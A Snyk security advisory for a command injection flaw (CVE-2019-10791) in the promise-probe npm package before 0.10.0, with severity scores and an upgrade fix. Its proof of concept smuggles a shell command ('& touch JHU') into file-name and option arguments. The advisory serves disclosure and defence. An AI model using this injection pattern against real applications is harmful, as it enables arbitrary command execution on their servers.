Command Injection Affecting promise-probe package, versions <0.10.0


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
1.92% (89th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Command Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-PROMISEPROBE-546816
  • published6 Feb 2020
  • disclosed4 Feb 2020
  • creditJHU System Security Lab

Introduced: 4 Feb 2020

CVE-2019-10791  (opens in a new tab)
CWE-78  (opens in a new tab)
First added by Snyk

How to fix?

Upgrade promise-probe to version 0.10.0 or higher.

Overview

promise-probe is a FFprobe wrapper.

Affected versions of this package are vulnerable to Command Injection via the ffprobe(file) and createMuteOgg(outputFile, options) functions. file,outputFile,options can be controlled by users without any sanitization

PoC by JHU System Security Lab

var root = require("promise-probe");

root.ffprobe("& touch JHU");

root.createMuteOgg("123",{seconds:"& touch JHU &"});

root.createMuteOgg("& touch JHU",{});

References

CVSS Scores

version 3.1